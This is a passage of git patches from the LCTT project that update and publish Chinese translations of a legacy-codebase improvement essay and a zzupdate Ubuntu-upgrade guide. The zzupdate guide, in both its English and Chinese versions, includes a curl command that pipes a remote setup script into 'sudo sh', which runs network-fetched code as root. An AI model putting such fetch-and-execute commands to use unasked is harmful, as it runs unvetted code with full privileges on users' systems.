+现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs。像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 ### 升级数据库 -如果在一个坚实且可维护的代码库上完成所有工作,如果你有更改数据库模式的计划,可以使用不同的完全替换数据库。 -把所有的这些都做完将能够帮助你更可靠的修改而不会碰到问题,你会完全的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 +如果你在一个坚实且可维护的代码库上完成所有工作,你就有选择,可以更改数据库模式的计划或者使用不同的完全替换数据库。之前完成的步骤能够帮助你更可靠的修改数据库而不会碰到问题,你可以完全的测试新数据库和新代码,而之前写的所有测试可以确保你顺利的迁移。 ### 按着路线图执行 @@ -70,25 +69,25 @@ Hacker News [mannykannot][1] 网友指出,修改架构并不总是可行,如 ### 任何时候都不要尝试彻底重写 -彻底重写是那种注定会失败的项目,一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天,非常不幸的是,这也是你失败的时候,假设业务逻辑存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你足够聪明,彻底重写系统通常不会成为一个摆到桌上讨论的选项。 +彻底重写是那种注定会失败的项目。一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天。非常不幸的是,这也是你失败的时候。假设业务逻辑被发现存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你聪明人,你会知道彻底重写系统根本不是一个可选的选择。 -### 所以,替代方法是增量迭代工作 +### 所以,替代方法:增量迭代工作 -要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,他可以是内核模块),试着使用旧的上下文去增量提升,如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面)至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两行。 +要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,也可能是内核模块),试着使用旧的上下文去增量提升。如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面),但至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两三行。 ### 发布! -每一次的修改都发布到生产环境,即使一些修改不是用户可见的。使用最少的步骤也是很重要的,因为当你缺乏对系统的了解时,只有生产环境能够告诉你问题在哪里,如果你只做了一个很小的修改之后出了问题,会有一些好处: +每一次的修改都发布到生产环境,即使一些修改不是用户可见的。使用最少的步骤也是很重要的,因为当你缺乏对系统的了解时,有时候只有生产环境能够告诉你问题在哪里。如果你只做了一个很小的修改之后出了问题,会有一些好处: * 很容易弄清楚出了什么问题 * 这是一个改进流程的好位置 * 你应该马上更新文档展示你的新见解 ### 使用代理的好处 -如果你做 web 开发时在旧系统和用户之间加了代理。你能很容易的控制每一个网址哪些请求旧系统,哪些重定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止,如果你的集成测试也连接到这个接口那就更好了。 +如果你做 web 开发那就谢天谢地要在旧系统和用户之间加一个代理。这样你能很容易的控制每一个网址哪些请求定向到旧系统,哪些请求定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到运行系统。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止。如果你的集成测试也能连接到这个接口那就更好了。 -### 是的,这会花费很多时间 -这取决于你怎样看待它的,这是事实会有一些重复的工作涉及到这些步骤中。但是它确实有效,对于进程的任何一个优化都将使你对这样系统更加熟悉。我会保持声誉,并且我真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,而且可能会影响客户。在这样的情况下,如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 +### 是的,但这会花费很多时间! +这就取决于你怎样看待它了。的确,在按照以上步骤优化代码时会有一些重复的工作步骤。但是它确实有效,而这里介绍的任何一个步骤都是假设你对系统的了解比现实要多。我需要保持声誉,也真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,或者有可能会严重影响到客户。在这样的情况下,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期。如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,那可能试着冒险一下没有错,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 -------------------------------------------------------------------------------- @@ -96,7 +95,7 @@ via: https://jacquesmattheij.com/improving-a-legacy-codebase 作者:[Jacques Mattheij][a] 译者:[aiwhj](https://github.com/aiwhj) -校对:[校对者ID](https://github.com/校对者ID) +校对:[JianqinWang](https://github.com/JianqinWang) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 26e4e914a8664d6da2e855ef3a1949fc30558f79 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 28 Dec 2017 08:48:51 +0800 Subject: [PATCH 0834/1627] translated --- ... Newer Version with This Single Command.md | 111 ------------------ ... Newer Version with This Single Command.md | 109 +++++++++++++++++ 2 files changed, 109 insertions(+), 111 deletions(-) delete mode 100644 sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md create mode 100644 translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md diff --git a/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md b/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md deleted file mode 100644 index ff186c1d80..0000000000 --- a/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md +++ /dev/null @@ -1,111 +0,0 @@ -translating---geekpi - -Easily Upgrade Ubuntu to a Newer Version with This Single Command -====== -[zzupdate][1] is an open source command line utility that makes the task of upgrading Ubuntu Desktop and Server to newer versions a tad bit easier by combining several update commands into one single command. - -Upgrading an Ubuntu system to a newer release is not a herculean task. Either with the GUI or with a couple of commands, you can easily upgrade your system to the latest release. - -On the other hand, zzupdate written by Gianluigi 'Zane' Zanettini handles clean, update, autoremove, version upgrade and composer self-update for your Ubuntu system with just a single command. - -It cleans up the local cache, updates available package information, and then perform a distribution upgrade. In the next step, it updates the Composer and removes the unused packages. - -The script must run as root user. - -### Installing zzupdate to upgrade Ubuntu to a newer version - -![Upgrade Ubuntu to a newer version with a single command][2] - -![Upgrade Ubuntu to a newer version with a single command][3] - -To install zzupdate, execute the below command in a Terminal. -``` -curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh -``` - -And then copy the provided sample configuration file to zzupdate.conf and set your preferences. -``` -sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf -``` - -Once you have everything, just use the following command and it will start upgrading your Ubuntu system to a newer version (if there is any). - -`sudo zzupdate` - -Note that zzupdate upgrades the system to the next available version in case of a normal release. However, when you are running Ubuntu 16.04 LTS, it tries to search for the next long-term support version only and not the latest version available. - -If you want to move out of the LTS release and upgrade to the latest release, you will have change some options. - -For Ubuntu desktop, open **Software & Updates** and under **Updates** tab and change Notify me of a new Ubuntu version to " **For any new version** ". - -![Software Updater in Ubuntu][2] - -![Software Updater in Ubuntu][4] - -For Ubuntu server, edit the release-upgrades file. -``` -vi /etc/update-manager/release-upgrades - -Prompt=normal -``` - -### Configuring zzupdate [optional] - -zzupdate options to configure -``` -REBOOT=1 -``` - -If this value is 1, a system restart is performed after an upgrade. -``` -REBOOT_TIMEOUT=15 -``` - -This sets up the reboot timeout to 900 seconds as some hardware takes much longer to reboot than others. -``` -VERSION_UPGRADE=1 -``` - -Executes version progression if an upgrade is available. -``` -VERSION_UPGRADE_SILENT=0 -``` - -Version progression occurs automatically. -``` -COMPOSER_UPGRADE=1 -``` - -Value '1' will automatically upgrade the composer. -``` -SWITCH_PROMPT_TO_NORMAL=0 -``` - -This features switches the Ubuntu Version updated to normal i.e. if you have an LTS release running, zzupdate won't upgrade it to Ubuntu 17.10 if its set to 0. It will search for an LTS version only. In contrast, value 1 searches for the latest release whether you are running an LTS or a normal release. - -Once done, all you have to do is run in console to run a complete update of your Ubuntu system -``` -sudo zzupdate -``` - -### Final Words - -Though the upgrade process for Ubuntu is in itself an easy one, zzupdate reduces it to mere one command. No coding knowledge is necessary and the process is complete config file driven. I personally found itself a good tool to update several Ubuntu systems without the need of taking care of different things separately. - -Are you willing to give it a try? - --------------------------------------------------------------------------------- - -via: https://itsfoss.com/zzupdate-upgrade-ubuntu/ - -作者:[Ambarish Kumar;Abhishek Prakash][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://itsfoss.com -[1]:https://github.com/TurboLabIt/zzupdate -[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= -[3]:https://itsfoss.com/wp-content/uploads/2017/11/upgrade-ubuntu-single-command-featured-800x450.jpg -[4]:https://itsfoss.com/wp-content/uploads/2017/11/software-update-any-new-version-800x378.jpeg diff --git a/translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md b/translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md new file mode 100644 index 0000000000..dc853e1808 --- /dev/null +++ b/translated/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md @@ -0,0 +1,109 @@ +使用一个命令轻松升级 Ubuntu 到较新的版本 +====== +[zzupdate][1] 是一个开源的命令行程序,通过将几个更新命令组合到一个命令中,使得将 Ubuntu 桌面和服务器版本升级到更新版本的任务变得容易一些。 + +将 Ubuntu 系统升级到更新的版本并不是一项艰巨的任务。无论是使用 GUI 还是使用几个命令,都可以轻松地将系统升级到最新版本。 + +另一方面,Gianluigi ‘Zane’ Zanettini 写的 zzupdate 只需一个命令就可以在 Ubuntu 中清理、更新、自动删除、版本升级、自我更新 composer。 + +它清理本地缓存,更新可用的软件包信息,然后执行发行版升级。在下一步中,它会更新 Composer 并删除未使用的软件包。 + +脚本必须以root用户身份运行。 + +### 安装 zzupdate 将 Ubuntu 升级到更新的版本 + +![Upgrade Ubuntu to a newer version with a single command][2] + +![Upgrade Ubuntu to a newer version with a single command][3] + +要安装 zzupdate,请在终端中执行以下命令。 +``` +curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh +``` + +然后将提供的示例配置文件复制到 zzupdate.conf 并设置你的首选项。 +``` +sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf +``` + +完成后,只要使用下面的命令,它就会开始升级你的 Ubuntu 系统到一个更新的版本(如果有的话)。 + +`sudo zzupdate` + +请注意,在普通版本下,zzupdate 会将系统升级到下一个可用的版本。但是,当你运行 Ubuntu 16.04 LTS 时,它将尝试仅搜索下一个长期支持版本,而不是可用的最新版本。 + +如果你想退出 LTS 版本并升级到最新版本,你将需要更改一些选项。 + +对于 Ubuntu 桌面,打开 **软件和更新** 和下面 **更新** 选项卡,并更改通知我新的 Ubuntu 版本选项为 “**对于任何新版本**”。 + +![Software Updater in Ubuntu][2] + +![Software Updater in Ubuntu][4] + +对于 Ubuntu 服务版,编辑版本升级文件。 +``` +vi /etc/update-manager/release-upgrades + +Prompt=normal +``` + +### 配置 zzupdate [可选] + +zzupdate 要配置的选项 +``` +REBOOT=1 +``` + +如果值为 1,升级后系统将重启。 +``` +REBOOT_TIMEOUT=15 +``` + +将重启超时设置为 900 秒,因为某些硬件比其他硬件重启需要更长的时间。 +``` +VERSION_UPGRADE=1 +``` + +如果升级可用,则执行版本升级。 +``` +VERSION_UPGRADE_SILENT=0 +``` + +自动显示版本进度 +``` +COMPOSER_UPGRADE=1 +``` + +值为 “1” 会自动升级 composer。 +``` +SWITCH_PROMPT_TO_NORMAL=0 +``` + +此功能将 Ubuntu 版本更新为普通版本,即如果你运行着 LTS 发行版,zzupdate 将不会将其升级到 Ubuntu 17.10(如果其设置为 0)。它将仅搜索 LTS 版本。相比之下,无论你运行着 LTS 或者普通版,“1” 都将搜索最新版本。 + +完成后,你要做的就是在控制台中运行一个完整的 Ubuntu 系统更新。 +``` +sudo zzupdate +``` + +### 最后的话 + +尽管 Ubuntu 的升级过程本身就很简单,但是 zzupdate 将它简化为一个命令。不需要编码知识,这个过程完全是配置文件驱动。我个人发现这是一个很好的更新几个 Ubuntu 系统的工具,而无需单独关心不同的事情。 + +你愿意试试吗? + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/zzupdate-upgrade-ubuntu/ + +作者:[Ambarish Kumar;Abhishek Prakash][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com +[1]:https://github.com/TurboLabIt/zzupdate +[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[3]:https://itsfoss.com/wp-content/uploads/2017/11/upgrade-ubuntu-single-command-featured-800x450.jpg +[4]:https://itsfoss.com/wp-content/uploads/2017/11/software-update-any-new-version-800x378.jpeg From 2bae21fb269539ec21d9a6946a0b0efd4648ba63 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 28 Dec 2017 08:51:51 +0800 Subject: [PATCH 0835/1627] translating --- ...71226 Dockerizing Compiled Software - Tianon-s Ramblings .md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md b/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md index 252180f1fd..de4e945b94 100644 --- a/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md +++ b/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md @@ -1,3 +1,5 @@ +translating---geekpi + Dockerizing Compiled Software ┈ Tianon's Ramblings ✿ ====== I recently went through a stint of closing a huge number of issues in the [docker-library/php][1] repository, and one of the oldest (and longest) discussions was related to installing depedencies for a compiling extensions, and I wrote a [semi-long comment][2] explaining how I do this in a general way for any software I wish to Dockerize. From 9aff7e413ec01073ace99d3f7ff6d475e89a9896 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 28 Dec 2017 09:34:50 +0800 Subject: [PATCH 0836/1627] PRF&PUB:20170530 How to Improve a Legacy Codebase.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @aiwhj @JianqinWang 辛苦了! --- ...170530 How to Improve a Legacy Codebase.md | 44 ++++++++++--------- 1 file changed, 23 insertions(+), 21 deletions(-) rename {translated/tech => published}/20170530 How to Improve a Legacy Codebase.md (54%) diff --git a/translated/tech/20170530 How to Improve a Legacy Codebase.md b/published/20170530 How to Improve a Legacy Codebase.md similarity index 54% rename from translated/tech/20170530 How to Improve a Legacy Codebase.md rename to published/20170530 How to Improve a Legacy Codebase.md index 8cd012a1c3..e5de1136a5 100644 --- a/translated/tech/20170530 How to Improve a Legacy Codebase.md +++ b/published/20170530 How to Improve a Legacy Codebase.md @@ -1,6 +1,7 @@ -# 如何改善遗留的代码库 +如何改善遗留的代码库 +================= -这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,给你留下了一坨几百万行屎一样的代码和(如果有的话)跟今日勉强支撑公司运行的代码驴头不对马嘴的文档。 +在每一个程序员、项目管理员、团队领导的一生中,这都会至少发生一次。原来的程序员早已离职去度假了,给你留下了一坨几百万行屎一样的、勉强支撑公司运行的代码和(如果有的话)跟代码驴头不对马嘴的文档。 你的任务:带领团队摆脱这个混乱的局面。 @@ -10,31 +11,31 @@ ### 备份 -在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题。配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方并不要轻易碰它,除非这些文件是只读模式。 +在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改了其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题。配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方并不要轻易碰它,除非这些文件是只读模式。 ### 重要的先决条件:必须确保代码能够在生产环境下构建运行并产出 -之前我假设环境已经存在,所以完全丢了这一步,但Hacker News 的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些预料之外的糟糕事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 +之前我假设环境已经存在,所以完全丢了这一步,但 Hacker News 的众多网友指出了这一点,并且事实证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些预料之外的糟糕事情。确保每一部分都尽力测试,之后在你足够确信它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 ### 冻结数据库 -直到你修改代码结束之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 +直到你修改代码结束之前尽可能冻结你的数据库,在你已经非常熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 ### 写测试 -在你做任何改变之前,尽可能多的写下端到端测试和集成测试。确保这些测试能够正确的输出,并测试你对旧的代码运行的各种假设(准备好应对一些意外状况)。这些测试有两个重要的作用:其一,他们能够在早期帮助你抛弃一些错误观念,其二,这些测试在你写新代码替换旧代码的时候也有一定防护作用。 +在你做任何改变之前,尽可能多的写一些端到端测试和集成测试。确保这些测试能够正确的输出,并测试你对旧的代码运行的各种假设(准备好应对一些意外状况)。这些测试有两个重要的作用:其一,它们能够在早期帮助你抛弃一些错误观念,其二,这些测试在你写新代码替换旧代码的时候也有一定防护作用。 要自动化测试,如果你有 CI 的使用经验可以用它,并确保在你提交代码之后 CI 能够快速的完成所有测试。 ### 日志监控 -如果旧设备依然可用,那么添加上监控功能。在一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,你就能大概知道放生多少事件会导致另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 +如果旧设备依然可用,那么添加上监控功能。在一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,你就能大概知道发生多少事件会导致另外一些种类的事件。例如:用户打开 APP 、用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其它的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 -这个简单的技巧可以将每一个后端应用变成一个像真实的簿记系统一样,而像一个真正的簿记系统,所有数字必须匹配,如果它们在某个地方对不上就有问题。 +这个简单的技巧可以将每一个后端应用变成一个像真实的簿记系统一样,而像一个真正的簿记系统,所有数字必须匹配,如果它们在某个地方对不上就有问题。 -随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 引进到生产环境的时间,以及对多种计数器造成的影响。 +随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 引入到生产环境的时间,以及对多种计数器造成的影响。 -我通常保持 5 分钟(一小时 12 次)记录一次计数器,但如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 +我通常保持每 5 分钟(一小时 12 次)记录一次计数器,但如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 ### 一次只修改一处 @@ -46,22 +47,21 @@ ### 修改架构 -接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让它模块化的时候,将大段代码分解成众多小的,不过不要改变量和数据结构的名字。 +接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果旧代码很庞杂,那么现在正是让它模块化的时候,将大段代码分解成众多小的部分,不过不要改变量和数据结构的名字。 -Hacker News [mannykannot][1] 网友指出,修改高层代码并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我赞同这一点也应该在这里加上提示,因此这里有一些补充。我额外想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 +Hacker News 的 [mannykannot][1] 网友指出,修改高层代码并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我赞同这一点也应该在这里加上提示,因此这里有一些补充。我想额外补充的是如果你修改高层代码的时候修改了一点点底层代码,那么试着只修改一个文件或者最坏的情况是只修改一个子系统,尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 ### 底层代码的重构 现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录并且理解模块之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 -### 修复 bugs +### 修复 bug -现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs。像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 +现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了几年的 bug。像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 ### 升级数据库 - -如果你在一个坚实且可维护的代码库上完成所有工作,你就有选择,可以更改数据库模式的计划或者使用不同的完全替换数据库。之前完成的步骤能够帮助你更可靠的修改数据库而不会碰到问题,你可以完全的测试新数据库和新代码,而之前写的所有测试可以确保你顺利的迁移。 +如果你在一个坚实且可维护的代码库上完成所有工作,你就可以选择更改数据库模式的计划,或者使用不同的完全替换数据库。之前完成的步骤能够帮助你更可靠的修改数据库而不会碰到问题,你可以完全的测试新数据库和新代码,而之前写的所有测试可以确保你顺利的迁移。 ### 按着路线图执行 @@ -69,11 +69,11 @@ Hacker News [mannykannot][1] 网友指出,修改高层代码并不总是可行 ### 任何时候都不要尝试彻底重写 -彻底重写是那种注定会失败的项目。一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天。非常不幸的是,这也是你失败的时候。假设业务逻辑被发现存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你聪明人,你会知道彻底重写系统根本不是一个可选的选择。 +彻底重写是那种注定会失败的项目。一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所有的问题都推到新系统马上就要上线的前一天。非常不幸的是,这也是你失败的时候。假设业务逻辑被发现存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你是聪明人,你会知道彻底重写系统根本不是一个可选的选择。 ### 所以,替代方法:增量迭代工作 -要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,也可能是内核模块),试着使用旧的上下文去增量提升。如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面),但至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两三行。 +要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,也可能是内核模块),试着使用旧的上下文去增量改进。如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面),但至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两三行。 ### 发布! @@ -84,10 +84,12 @@ Hacker News [mannykannot][1] 网友指出,修改高层代码并不总是可行 * 你应该马上更新文档展示你的新见解 ### 使用代理的好处 -如果你做 web 开发那就谢天谢地要在旧系统和用户之间加一个代理。这样你能很容易的控制每一个网址哪些请求定向到旧系统,哪些请求定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到运行系统。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止。如果你的集成测试也能连接到这个接口那就更好了。 + +如果你做 web 开发那就谢天谢地吧,可以在旧系统和用户之间加一个代理。这样你能很容易的控制每一个网址哪些请求定向到旧系统,哪些请求定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到运行系统。如果你的代理足够的聪明,你可以使用它针对个别 URL 把一定比例的流量发送到新系统,直到你满意为止。如果你的集成测试也能连接到这个接口那就更好了。 ### 是的,但这会花费很多时间! -这就取决于你怎样看待它了。的确,在按照以上步骤优化代码时会有一些重复的工作步骤。但是它确实有效,而这里介绍的任何一个步骤都是假设你对系统的了解比现实要多。我需要保持声誉,也真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,或者有可能会严重影响到客户。在这样的情况下,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期。如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,那可能试着冒险一下没有错,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 + +这就取决于你怎样看待它了。的确,在按照以上步骤优化代码时会有一些重复的工作步骤。但是它确实有效,而这里介绍的任何一个步骤都是假设你对系统的了解比现实要多。我需要保持声誉,也真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,或者有可能会严重影响到客户。在这样的情况下,我比较喜欢完全控制整个流程得到好的结果,而不是节省两天或者一星期。如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,那可能试着冒险一下没有错,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 -------------------------------------------------------------------------------- @@ -95,7 +97,7 @@ via: https://jacquesmattheij.com/improving-a-legacy-codebase 作者:[Jacques Mattheij][a] 译者:[aiwhj](https://github.com/aiwhj) -校对:[JianqinWang](https://github.com/JianqinWang) +校对:[JianqinWang](https://github.com/JianqinWang), [wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 33abe404629e931f831f37411743915fb2fafbe0 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 28 Dec 2017 11:00:19 +0800 Subject: [PATCH 0837/1627] translate done: 20171222 Improve your code searching skills with pss.md --- ...ove your code searching skills with pss.md | 83 ------------------- ...ove your code searching skills with pss.md | 82 ++++++++++++++++++ 2 files changed, 82 insertions(+), 83 